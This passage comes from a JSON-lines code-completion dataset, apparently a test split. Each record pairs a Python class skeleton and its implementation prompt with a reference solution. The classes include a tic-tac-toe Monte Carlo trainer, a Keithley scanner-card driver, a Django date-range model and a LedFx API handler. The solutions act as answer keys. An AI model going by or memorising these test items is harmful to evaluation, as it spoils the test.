<|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if read_first:\n self.policy_1, self.i_epoch = pickle.load(open(path, 'rb'))\n print('Policy read from file. Trained for %i epochs.' % self.i_epoch)\n self.path = path\n self.i_epoch = 0\n self.policy_1 = TabularPolicy()\n<|end_body_0|>\n\n<|body_start_1|>\n self.policy_2 = TabularPolicy()\n returns = dict()\n for num in range(int('1' + '0' * 9, 3), int('2' * 10, 3) + 1):\n returns[num] = []\n for _ in range(n_epoch):\n s = State().get_num()\n history = [s]\n while not State(from_base10=s).is_terminal():\n s = self.policy_1.move_dict[s]\n history.append(s)\n if State(from_base10=s).is_terminal():\n break\n s = self.policy_2.move_dict[s]\n history.append(s)\n g = State(from_base10=s).get_reward()\n for i, s in enumerate(history):\n returns[s].append(g)\n if i % 2 == 0:\n self.policy_1.v_dict[s] = np.average(returns[s])\n else:\n self.policy_2.v_dict[s] = np.average(returns[s])\n for num in range(int('2' + '0' * 9, 3), int('2' * 10, 3) + 1):\n self.policy_1.v_dict[num] = self.policy_2.v_dict[num]\n self.i_epoch += 1\n pickle.dump((self.policy_1, self.i_epoch), open(self.path, 'wb'))\n print('MC prediction finished.')\n<|end_body_1|>\n", "revision_id": "5831d4c1eaf21d41007eb6988f3c9885b55d13b2", "skeleton": "<|skeleton|>\nclass TrainOneRound:\n\n def __init__(self, path, read_first=False):\n \"\"\"Input: path: the path to save the policy read_first: if true, read from the path first\"\"\"\n <|body_0|>\n\n def MCPrediction(self, n_epoch):\n \"\"\"MC prediction following Sutton Barto 5.1 Against rush opponent Input: n_epoch: the number of episodes to be trained\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TrainOneRound:\n def __init__(self, path, read_first=False):\n \"\"\"Input: path: the path to save the policy read_first: if true, read from the path first\"\"\"\n if read_first:\n self.policy_1, self.i_epoch = pickle.load(open(path, 'rb'))\n print('Policy read from file. Trained for %i epochs.' % self.i_epoch)\n self.path = path\n self.i_epoch = 0\n self.policy_1 = TabularPolicy()\n\n def MCPrediction(self, n_epoch):\n \"\"\"MC prediction following Sutton Barto 5.1 Against rush opponent Input: n_epoch: the number of episodes to be trained\"\"\"\n self.policy_2 = TabularPolicy()\n returns = dict()\n for num in range(int('1' + '0' * 9, 3), int('2' * 10, 3) + 1):\n returns[num] = []\n for _ in range(n_epoch):\n s = State().get_num()\n history = [s]\n while not State(from_base10=s).is_terminal():\n s = self.policy_1.move_dict[s]\n history.append(s)\n if State(from_base10=s).is_terminal():\n break\n s = self.policy_2.move_dict[s]\n history.append(s)\n g = State(from_base10=s).get_reward()\n for i, s in enumerate(history):\n returns[s].append(g)\n if i % 2 == 0:\n self.policy_1.v_dict[s] = np.average(returns[s])\n else:\n self.policy_2.v_dict[s] = np.average(returns[s])\n for num in range(int('2' + '0' * 9, 3), int('2' * 10, 3) + 1):\n self.policy_1.v_dict[num] = self.policy_2.v_dict[num]\n self.i_epoch += 1\n pickle.dump((self.policy_1, self.i_epoch), open(self.path, 'wb'))\n print('MC prediction finished.')\n", "source": "the_stack_v2_python_sparse", "source_path": "ttt_train_mc_prediction.py", "source_repo": "sw2703/rl_tictactoe", "split": "test", "star_events_count": 0} {"blob_id": "6a192b5d3589512e1186f9a24874c5a71dbb6ea5", "bodies": ["super().__init__(dmm, f'ch{channel}', **kwargs)\nself.channel = channel\nself.dmm = dmm\nself.add_parameter('resistance', unit='Ohm', label=f'Resistance CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'RES'))\nself.add_parameter('resistance_4w', unit='Ohm', label=f'Resistance (4-wire) CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'FRES'))\nself.add_parameter('voltage_dc', unit='V', label=f'DC Voltage CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'VOLT'))\nself.add_parameter('current_dc', unit='A', label=f'DC current CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'CURR'))", "if self.dmm.active_terminal.get() == 'REAR':\n self.write(f\"SENS:FUNC '{quantity}', (@{self.channel:d})\")\n self.write(f'ROUT:CLOS (@{self.channel:d})')\n return self.ask('READ?')\nelse:\n raise RuntimeError('Front terminal is active instead of rear terminal.')"], "bodies_text": "<|body_start_0|>\n super().__init__(dmm, f'ch{channel}', **kwargs)\n self.channel = channel\n self.dmm = dmm\n self.add_parameter('resistance', unit='Ohm', label=f'Resistance CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'RES'))\n self.add_parameter('resistance_4w', unit='Ohm', label=f'Resistance (4-wire) CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'FRES'))\n self.add_parameter('voltage_dc', unit='V', label=f'DC Voltage CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'VOLT'))\n self.add_parameter('current_dc', unit='A', label=f'DC current CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'CURR'))\n<|end_body_0|>\n\n<|body_start_1|>\n if self.dmm.active_terminal.get() == 'REAR':\n self.write(f\"SENS:FUNC '{quantity}', (@{self.channel:d})\")\n self.write(f'ROUT:CLOS (@{self.channel:d})')\n return self.ask('READ?')\n else:\n raise RuntimeError('Front terminal is active instead of rear terminal.')\n<|end_body_1|>\n", "class_docstring": "This is the qcodes driver for a channel of the 2000-SCAN scanner card.", "class_name": "Keithley_2000_Scan_Channel", "detected_licenses": ["GPL-2.0-only", "GPL-2.0-or-later", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Keithley_2000_Scan_Channel:\n \"\"\"This is the qcodes driver for a channel of the 2000-SCAN scanner card.\"\"\"\n\n def __init__(self, dmm: 'Keithley_6500', channel: int, **kwargs) -> None:\n \"\"\"Initialize instance of scanner card Keithley 2000-SCAN Args: dmm: Instance of digital multimeter Keithley6500 containing the scanner card channel: Channel number **kwargs: Keyword arguments to pass to __init__ function of InstrumentChannel class\"\"\"\n <|body_0|>\n\n def _measure(self, quantity: str) -> str:\n \"\"\"Measure given quantity at rear terminal of the instrument. Only perform measurement if rear terminal is active. Send SCPI command to measure and read out given quantity. Args: quantity: Quantity to be measured Returns: Measurement result\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(dmm, f'ch{channel}', **kwargs)\n self.channel = channel\n self.dmm = dmm\n self.add_parameter('resistance', unit='Ohm', label=f'Resistance CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'RES'))\n self.add_parameter('resistance_4w', unit='Ohm', label=f'Resistance (4-wire) CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'FRES'))\n self.add_parameter('voltage_dc', unit='V', label=f'DC Voltage CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'VOLT'))\n self.add_parameter('current_dc', unit='A', label=f'DC current CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'CURR'))\n<|end_body_0|>\n\n<|body_start_1|>\n if self.dmm.active_terminal.get() == 'REAR':\n self.write(f\"SENS:FUNC '{quantity}', (@{self.channel:d})\")\n self.write(f'ROUT:CLOS (@{self.channel:d})')\n return self.ask('READ?')\n else:\n raise RuntimeError('Front terminal is active instead of rear terminal.')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000223", "length_bytes": 2543, "license_type": "permissive", "methods": [{"docstring": "Initialize instance of scanner card Keithley 2000-SCAN Args: dmm: Instance of digital multimeter Keithley6500 containing the scanner card channel: Channel number **kwargs: Keyword arguments to pass to __init__ function of InstrumentChannel class", "name": "__init__", "signature": "def __init__(self, dmm: 'Keithley_6500', channel: int, **kwargs) -> None"}, {"docstring": "Measure given quantity at rear terminal of the instrument. Only perform measurement if rear terminal is active. Send SCPI command to measure and read out given quantity. Args: quantity: Quantity to be measured Returns: Measurement result", "name": "_measure", "signature": "def _measure(self, quantity: str) -> str"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005649", "prompt": "Implement the Python class `Keithley_2000_Scan_Channel` described below.\n\nClass description:\nThis is the qcodes driver for a channel of the 2000-SCAN scanner card.\n\nMethod signatures and docstrings:\n- def __init__(self, dmm: 'Keithley_6500', channel: int, **kwargs) -> None: Initialize instance of scanner card Keithley 2000-SCAN Args: dmm: Instance of digital multimeter Keithley6500 containing the scanner card channel: Channel number **kwargs: Keyword arguments to pass to __init__ function of InstrumentChannel class\n- def _measure(self, quantity: str) -> str: Measure given quantity at rear terminal of the instrument. Only perform measurement if rear terminal is active. Send SCPI command to measure and read out given quantity. Args: quantity: Quantity to be measured Returns: Measurement result", "prompted_full_text": "Implement the Python class `Keithley_2000_Scan_Channel` described below.\n\nClass description:\nThis is the qcodes driver for a channel of the 2000-SCAN scanner card.\n\nMethod signatures and docstrings:\n- def __init__(self, dmm: 'Keithley_6500', channel: int, **kwargs) -> None: Initialize instance of scanner card Keithley 2000-SCAN Args: dmm: Instance of digital multimeter Keithley6500 containing the scanner card channel: Channel number **kwargs: Keyword arguments to pass to __init__ function of InstrumentChannel class\n- def _measure(self, quantity: str) -> str: Measure given quantity at rear terminal of the instrument. Only perform measurement if rear terminal is active. Send SCPI command to measure and read out given quantity. Args: quantity: Quantity to be measured Returns: Measurement result\n\n<|skeleton|>\nclass Keithley_2000_Scan_Channel:\n \"\"\"This is the qcodes driver for a channel of the 2000-SCAN scanner card.\"\"\"\n\n def __init__(self, dmm: 'Keithley_6500', channel: int, **kwargs) -> None:\n \"\"\"Initialize instance of scanner card Keithley 2000-SCAN Args: dmm: Instance of digital multimeter Keithley6500 containing the scanner card channel: Channel number **kwargs: Keyword arguments to pass to __init__ function of InstrumentChannel class\"\"\"\n <|body_0|>\n\n def _measure(self, quantity: str) -> str:\n \"\"\"Measure given quantity at rear terminal of the instrument. Only perform measurement if rear terminal is active. Send SCPI command to measure and read out given quantity. Args: quantity: Quantity to be measured Returns: Measurement result\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(dmm, f'ch{channel}', **kwargs)\n self.channel = channel\n self.dmm = dmm\n self.add_parameter('resistance', unit='Ohm', label=f'Resistance CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'RES'))\n self.add_parameter('resistance_4w', unit='Ohm', label=f'Resistance (4-wire) CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'FRES'))\n self.add_parameter('voltage_dc', unit='V', label=f'DC Voltage CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'VOLT'))\n self.add_parameter('current_dc', unit='A', label=f'DC current CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'CURR'))\n<|end_body_0|>\n\n<|body_start_1|>\n if self.dmm.active_terminal.get() == 'REAR':\n self.write(f\"SENS:FUNC '{quantity}', (@{self.channel:d})\")\n self.write(f'ROUT:CLOS (@{self.channel:d})')\n return self.ask('READ?')\n else:\n raise RuntimeError('Front terminal is active instead of rear terminal.')\n<|end_body_1|>\n", "revision_id": "e07c9f23339ab00b0f4c4cc46711593d88f7fc84", "skeleton": "<|skeleton|>\nclass Keithley_2000_Scan_Channel:\n \"\"\"This is the qcodes driver for a channel of the 2000-SCAN scanner card.\"\"\"\n\n def __init__(self, dmm: 'Keithley_6500', channel: int, **kwargs) -> None:\n \"\"\"Initialize instance of scanner card Keithley 2000-SCAN Args: dmm: Instance of digital multimeter Keithley6500 containing the scanner card channel: Channel number **kwargs: Keyword arguments to pass to __init__ function of InstrumentChannel class\"\"\"\n <|body_0|>\n\n def _measure(self, quantity: str) -> str:\n \"\"\"Measure given quantity at rear terminal of the instrument. Only perform measurement if rear terminal is active. Send SCPI command to measure and read out given quantity. Args: quantity: Quantity to be measured Returns: Measurement result\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Keithley_2000_Scan_Channel:\n \"\"\"This is the qcodes driver for a channel of the 2000-SCAN scanner card.\"\"\"\n\n def __init__(self, dmm: 'Keithley_6500', channel: int, **kwargs) -> None:\n \"\"\"Initialize instance of scanner card Keithley 2000-SCAN Args: dmm: Instance of digital multimeter Keithley6500 containing the scanner card channel: Channel number **kwargs: Keyword arguments to pass to __init__ function of InstrumentChannel class\"\"\"\n super().__init__(dmm, f'ch{channel}', **kwargs)\n self.channel = channel\n self.dmm = dmm\n self.add_parameter('resistance', unit='Ohm', label=f'Resistance CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'RES'))\n self.add_parameter('resistance_4w', unit='Ohm', label=f'Resistance (4-wire) CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'FRES'))\n self.add_parameter('voltage_dc', unit='V', label=f'DC Voltage CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'VOLT'))\n self.add_parameter('current_dc', unit='A', label=f'DC current CH{self.channel}', get_parser=float, get_cmd=partial(self._measure, 'CURR'))\n\n def _measure(self, quantity: str) -> str:\n \"\"\"Measure given quantity at rear terminal of the instrument. Only perform measurement if rear terminal is active. Send SCPI command to measure and read out given quantity. Args: quantity: Quantity to be measured Returns: Measurement result\"\"\"\n if self.dmm.active_terminal.get() == 'REAR':\n self.write(f\"SENS:FUNC '{quantity}', (@{self.channel:d})\")\n self.write(f'ROUT:CLOS (@{self.channel:d})')\n return self.ask('READ?')\n else:\n raise RuntimeError('Front terminal is active instead of rear terminal.')\n", "source": "the_stack_v2_python_sparse", "source_path": "qcodes_contrib_drivers/drivers/Tektronix/Keithley_2000_Scan.py", "source_repo": "QCoDeS/Qcodes_contrib_drivers", "split": "test", "star_events_count": 32} {"blob_id": "c8c7743fa094ded31aa581a690b015718024a24f", "bodies": ["if not self.start_year and (not self.end_year):\n return ''\nif self.start_year == self.end_year:\n return self.start_year\ndate_parts = [self.start_year, '-', self.end_year]\nreturn ''.join([str(dp) for dp in date_parts if dp is not None])", "if exclude is None:\n exclude = []\nif 'start_year' in exclude or 'end_year' in exclude:\n return\nif self.start_year and self.end_year and (self.end_year < self.start_year):\n raise ValidationError('End year must be after start year')"], "bodies_text": "<|body_start_0|>\n if not self.start_year and (not self.end_year):\n return ''\n if self.start_year == self.end_year:\n return self.start_year\n date_parts = [self.start_year, '-', self.end_year]\n return ''.join([str(dp) for dp in date_parts if dp is not None])\n<|end_body_0|>\n\n<|body_start_1|>\n if exclude is None:\n exclude = []\n if 'start_year' in exclude or 'end_year' in exclude:\n return\n if self.start_year and self.end_year and (self.end_year < self.start_year):\n raise ValidationError('End year must be after start year')\n<|end_body_1|>\n", "class_docstring": "Abstract model with optional start and end years, and a custom dates property to display the date range nicely. Includes validation that requires end year falls after start year.", "class_name": "DateRange", "detected_licenses": ["Apache-2.0", "LicenseRef-scancode-free-unknown"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DateRange:\n \"\"\"Abstract model with optional start and end years, and a custom dates property to display the date range nicely. Includes validation that requires end year falls after start year.\"\"\"\n\n def dates(self):\n \"\"\"Date or date range as a string for display\"\"\"\n <|body_0|>\n\n def clean_fields(self, exclude=None):\n \"\"\"Override to clean fields to make sure start/end year are sensical\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not self.start_year and (not self.end_year):\n return ''\n if self.start_year == self.end_year:\n return self.start_year\n date_parts = [self.start_year, '-', self.end_year]\n return ''.join([str(dp) for dp in date_parts if dp is not None])\n<|end_body_0|>\n\n<|body_start_1|>\n if exclude is None:\n exclude = []\n if 'start_year' in exclude or 'end_year' in exclude:\n return\n if self.start_year and self.end_year and (self.end_year < self.start_year):\n raise ValidationError('End year must be after start year')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000224", "length_bytes": 2365, "license_type": "permissive", "methods": [{"docstring": "Date or date range as a string for display", "name": "dates", "signature": "def dates(self)"}, {"docstring": "Override to clean fields to make sure start/end year are sensical", "name": "clean_fields", "signature": "def clean_fields(self, exclude=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001106", "prompt": "Implement the Python class `DateRange` described below.\n\nClass description:\nAbstract model with optional start and end years, and a custom dates property to display the date range nicely. Includes validation that requires end year falls after start year.\n\nMethod signatures and docstrings:\n- def dates(self): Date or date range as a string for display\n- def clean_fields(self, exclude=None): Override to clean fields to make sure start/end year are sensical", "prompted_full_text": "Implement the Python class `DateRange` described below.\n\nClass description:\nAbstract model with optional start and end years, and a custom dates property to display the date range nicely. Includes validation that requires end year falls after start year.\n\nMethod signatures and docstrings:\n- def dates(self): Date or date range as a string for display\n- def clean_fields(self, exclude=None): Override to clean fields to make sure start/end year are sensical\n\n<|skeleton|>\nclass DateRange:\n \"\"\"Abstract model with optional start and end years, and a custom dates property to display the date range nicely. Includes validation that requires end year falls after start year.\"\"\"\n\n def dates(self):\n \"\"\"Date or date range as a string for display\"\"\"\n <|body_0|>\n\n def clean_fields(self, exclude=None):\n \"\"\"Override to clean fields to make sure start/end year are sensical\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not self.start_year and (not self.end_year):\n return ''\n if self.start_year == self.end_year:\n return self.start_year\n date_parts = [self.start_year, '-', self.end_year]\n return ''.join([str(dp) for dp in date_parts if dp is not None])\n<|end_body_0|>\n\n<|body_start_1|>\n if exclude is None:\n exclude = []\n if 'start_year' in exclude or 'end_year' in exclude:\n return\n if self.start_year and self.end_year and (self.end_year < self.start_year):\n raise ValidationError('End year must be after start year')\n<|end_body_1|>\n", "revision_id": "6371bb1266d7751af59aeaa3426ef7ac02a1fe17", "skeleton": "<|skeleton|>\nclass DateRange:\n \"\"\"Abstract model with optional start and end years, and a custom dates property to display the date range nicely. Includes validation that requires end year falls after start year.\"\"\"\n\n def dates(self):\n \"\"\"Date or date range as a string for display\"\"\"\n <|body_0|>\n\n def clean_fields(self, exclude=None):\n \"\"\"Override to clean fields to make sure start/end year are sensical\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DateRange:\n \"\"\"Abstract model with optional start and end years, and a custom dates property to display the date range nicely. Includes validation that requires end year falls after start year.\"\"\"\n\n def dates(self):\n \"\"\"Date or date range as a string for display\"\"\"\n if not self.start_year and (not self.end_year):\n return ''\n if self.start_year == self.end_year:\n return self.start_year\n date_parts = [self.start_year, '-', self.end_year]\n return ''.join([str(dp) for dp in date_parts if dp is not None])\n\n def clean_fields(self, exclude=None):\n \"\"\"Override to clean fields to make sure start/end year are sensical\"\"\"\n if exclude is None:\n exclude = []\n if 'start_year' in exclude or 'end_year' in exclude:\n return\n if self.start_year and self.end_year and (self.end_year < self.start_year):\n raise ValidationError('End year must be after start year')\n", "source": "the_stack_v2_python_sparse", "source_path": "derrida/common/models.py", "source_repo": "Princeton-CDH/derrida-django", "split": "test", "star_events_count": 13} {"blob_id": "50d7b1ce219368bb0e8e622f1062c326f754ef1b", "bodies": ["if columns != []:\n for i, _ in enumerate(dicts):\n dicts[i] = {c: dicts[i][c] for c in columns}\n return dicts\nelse:\n return dicts", "sim_dict = {'А': 'A', 'Р': 'P', 'К': 'K', 'В': 'B', 'Т': 'T', 'С': 'C', 'Х': 'X', 'Е': 'E', 'О': 'O', 'Н': 'H', 'М': 'M'}\nfor sym in sim_dict.keys():\n text = text.replace(sym, sim_dict[sym])\nreturn text", "ts = int(date)\ndate = datetime.utcfromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\nreturn str(date)"], "bodies_text": "<|body_start_0|>\n if columns != []:\n for i, _ in enumerate(dicts):\n dicts[i] = {c: dicts[i][c] for c in columns}\n return dicts\n else:\n return dicts\n<|end_body_0|>\n\n<|body_start_1|>\n sim_dict = {'А': 'A', 'Р': 'P', 'К': 'K', 'В': 'B', 'Т': 'T', 'С': 'C', 'Х': 'X', 'Е': 'E', 'О': 'O', 'Н': 'H', 'М': 'M'}\n for sym in sim_dict.keys():\n text = text.replace(sym, sim_dict[sym])\n return text\n<|end_body_1|>\n\n<|body_start_2|>\n ts = int(date)\n date = datetime.utcfromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n return str(date)\n<|end_body_2|>\n", "class_docstring": "Simple auxiliary filtering class", "class_name": "DataFiltering", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DataFiltering:\n \"\"\"Simple auxiliary filtering class\"\"\"\n\n def dict_list_slice(dicts: list, columns: list) -> list:\n \"\"\"Slices list of dicts by given columns(keys) Parameters ---------- dicts : list list of dicts columns : list column(keys) names Returns ------- list list of dicts sliced by given keys\"\"\"\n <|body_0|>\n\n def cyrillic_to_latin(text: str) -> str:\n \"\"\"Changes all cyrllic letter to its latin analog Parameters ---------- text : str text where you want to change cyrillic letters Returns ------- str modified string\"\"\"\n <|body_1|>\n\n def timestamp_to_date(date: Union[str, int]) -> str:\n \"\"\"transforms timestamp date to Y-m-d H:M:S format Parameters ---------- date : Union[str, int] timestamp string or int Returns ------- str formatted date string in Y-m-d H:M:S format\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if columns != []:\n for i, _ in enumerate(dicts):\n dicts[i] = {c: dicts[i][c] for c in columns}\n return dicts\n else:\n return dicts\n<|end_body_0|>\n\n<|body_start_1|>\n sim_dict = {'А': 'A', 'Р': 'P', 'К': 'K', 'В': 'B', 'Т': 'T', 'С': 'C', 'Х': 'X', 'Е': 'E', 'О': 'O', 'Н': 'H', 'М': 'M'}\n for sym in sim_dict.keys():\n text = text.replace(sym, sim_dict[sym])\n return text\n<|end_body_1|>\n\n<|body_start_2|>\n ts = int(date)\n date = datetime.utcfromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n return str(date)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000225", "length_bytes": 1854, "license_type": "permissive", "methods": [{"docstring": "Slices list of dicts by given columns(keys) Parameters ---------- dicts : list list of dicts columns : list column(keys) names Returns ------- list list of dicts sliced by given keys", "name": "dict_list_slice", "signature": "def dict_list_slice(dicts: list, columns: list) -> list"}, {"docstring": "Changes all cyrllic letter to its latin analog Parameters ---------- text : str text where you want to change cyrillic letters Returns ------- str modified string", "name": "cyrillic_to_latin", "signature": "def cyrillic_to_latin(text: str) -> str"}, {"docstring": "transforms timestamp date to Y-m-d H:M:S format Parameters ---------- date : Union[str, int] timestamp string or int Returns ------- str formatted date string in Y-m-d H:M:S format", "name": "timestamp_to_date", "signature": "def timestamp_to_date(date: Union[str, int]) -> str"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005850", "prompt": "Implement the Python class `DataFiltering` described below.\n\nClass description:\nSimple auxiliary filtering class\n\nMethod signatures and docstrings:\n- def dict_list_slice(dicts: list, columns: list) -> list: Slices list of dicts by given columns(keys) Parameters ---------- dicts : list list of dicts columns : list column(keys) names Returns ------- list list of dicts sliced by given keys\n- def cyrillic_to_latin(text: str) -> str: Changes all cyrllic letter to its latin analog Parameters ---------- text : str text where you want to change cyrillic letters Returns ------- str modified string\n- def timestamp_to_date(date: Union[str, int]) -> str: transforms timestamp date to Y-m-d H:M:S format Parameters ---------- date : Union[str, int] timestamp string or int Returns ------- str formatted date string in Y-m-d H:M:S format", "prompted_full_text": "Implement the Python class `DataFiltering` described below.\n\nClass description:\nSimple auxiliary filtering class\n\nMethod signatures and docstrings:\n- def dict_list_slice(dicts: list, columns: list) -> list: Slices list of dicts by given columns(keys) Parameters ---------- dicts : list list of dicts columns : list column(keys) names Returns ------- list list of dicts sliced by given keys\n- def cyrillic_to_latin(text: str) -> str: Changes all cyrllic letter to its latin analog Parameters ---------- text : str text where you want to change cyrillic letters Returns ------- str modified string\n- def timestamp_to_date(date: Union[str, int]) -> str: transforms timestamp date to Y-m-d H:M:S format Parameters ---------- date : Union[str, int] timestamp string or int Returns ------- str formatted date string in Y-m-d H:M:S format\n\n<|skeleton|>\nclass DataFiltering:\n \"\"\"Simple auxiliary filtering class\"\"\"\n\n def dict_list_slice(dicts: list, columns: list) -> list:\n \"\"\"Slices list of dicts by given columns(keys) Parameters ---------- dicts : list list of dicts columns : list column(keys) names Returns ------- list list of dicts sliced by given keys\"\"\"\n <|body_0|>\n\n def cyrillic_to_latin(text: str) -> str:\n \"\"\"Changes all cyrllic letter to its latin analog Parameters ---------- text : str text where you want to change cyrillic letters Returns ------- str modified string\"\"\"\n <|body_1|>\n\n def timestamp_to_date(date: Union[str, int]) -> str:\n \"\"\"transforms timestamp date to Y-m-d H:M:S format Parameters ---------- date : Union[str, int] timestamp string or int Returns ------- str formatted date string in Y-m-d H:M:S format\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if columns != []:\n for i, _ in enumerate(dicts):\n dicts[i] = {c: dicts[i][c] for c in columns}\n return dicts\n else:\n return dicts\n<|end_body_0|>\n\n<|body_start_1|>\n sim_dict = {'А': 'A', 'Р': 'P', 'К': 'K', 'В': 'B', 'Т': 'T', 'С': 'C', 'Х': 'X', 'Е': 'E', 'О': 'O', 'Н': 'H', 'М': 'M'}\n for sym in sim_dict.keys():\n text = text.replace(sym, sim_dict[sym])\n return text\n<|end_body_1|>\n\n<|body_start_2|>\n ts = int(date)\n date = datetime.utcfromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n return str(date)\n<|end_body_2|>\n", "revision_id": "7bf107b448cdd0e5d7f1cf85726b06c677ed922d", "skeleton": "<|skeleton|>\nclass DataFiltering:\n \"\"\"Simple auxiliary filtering class\"\"\"\n\n def dict_list_slice(dicts: list, columns: list) -> list:\n \"\"\"Slices list of dicts by given columns(keys) Parameters ---------- dicts : list list of dicts columns : list column(keys) names Returns ------- list list of dicts sliced by given keys\"\"\"\n <|body_0|>\n\n def cyrillic_to_latin(text: str) -> str:\n \"\"\"Changes all cyrllic letter to its latin analog Parameters ---------- text : str text where you want to change cyrillic letters Returns ------- str modified string\"\"\"\n <|body_1|>\n\n def timestamp_to_date(date: Union[str, int]) -> str:\n \"\"\"transforms timestamp date to Y-m-d H:M:S format Parameters ---------- date : Union[str, int] timestamp string or int Returns ------- str formatted date string in Y-m-d H:M:S format\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DataFiltering:\n \"\"\"Simple auxiliary filtering class\"\"\"\n\n def dict_list_slice(dicts: list, columns: list) -> list:\n \"\"\"Slices list of dicts by given columns(keys) Parameters ---------- dicts : list list of dicts columns : list column(keys) names Returns ------- list list of dicts sliced by given keys\"\"\"\n if columns != []:\n for i, _ in enumerate(dicts):\n dicts[i] = {c: dicts[i][c] for c in columns}\n return dicts\n else:\n return dicts\n\n def cyrillic_to_latin(text: str) -> str:\n \"\"\"Changes all cyrllic letter to its latin analog Parameters ---------- text : str text where you want to change cyrillic letters Returns ------- str modified string\"\"\"\n sim_dict = {'А': 'A', 'Р': 'P', 'К': 'K', 'В': 'B', 'Т': 'T', 'С': 'C', 'Х': 'X', 'Е': 'E', 'О': 'O', 'Н': 'H', 'М': 'M'}\n for sym in sim_dict.keys():\n text = text.replace(sym, sim_dict[sym])\n return text\n\n def timestamp_to_date(date: Union[str, int]) -> str:\n \"\"\"transforms timestamp date to Y-m-d H:M:S format Parameters ---------- date : Union[str, int] timestamp string or int Returns ------- str formatted date string in Y-m-d H:M:S format\"\"\"\n ts = int(date)\n date = datetime.utcfromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n return str(date)\n", "source": "the_stack_v2_python_sparse", "source_path": "advancedbot/components/utils/datafiltering.py", "source_repo": "sdallaboratory/advanced-telegram-bot", "split": "test", "star_events_count": 6} {"blob_id": "c00591a65be37964410e6721427eb7926fcdb278", "bodies": ["virtual = self._ledfx.virtuals.get(virtual_id)\nif virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\nresponse = {'status': 'success'}\nresponse[virtual.id] = {'config': virtual.config, 'id': virtual.id, 'is_device': virtual.is_device, 'auto_generated': virtual.auto_generated, 'segments': virtual.segments, 'pixel_count': virtual.pixel_count, 'active': virtual.active, 'effect': {}}\nif virtual.active_effect:\n effect_response = {}\n effect_response['config'] = virtual.active_effect.config\n effect_response['name'] = virtual.active_effect.name\n effect_response['type'] = virtual.active_effect.type\n response[virtual.id]['effect'] = effect_response\nreturn web.json_response(data=response, status=200)", "virtual = self._ledfx.virtuals.get(virtual_id)\nif virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\ntry:\n data = await request.json()\nexcept JSONDecodeError:\n response = {'status': 'failed', 'reason': 'JSON Decoding failed'}\n return web.json_response(data=response, status=400)\nactive = data.get('active')\nif active is None:\n response = {'status': 'failed', 'reason': 'Required attribute \"active\" was not provided'}\n return web.json_response(data=response, status=400)\ntry:\n virtual.active = active\nexcept ValueError as msg:\n response = {'status': 'failed', 'payload': {'type': 'warning', 'reason': str(msg)}}\n return web.json_response(data=response, status=202)\nfor idx, item in enumerate(self._ledfx.config['virtuals']):\n if item['id'] == virtual.id:\n item['active'] = virtual.active\n self._ledfx.config['virtuals'][idx] = item\n break\nsave_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\nresponse = {'status': 'success', 'active': virtual.active}\nreturn web.json_response(data=response, status=200)", "virtual = self._ledfx.virtuals.get(virtual_id)\nif virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\ntry:\n data = 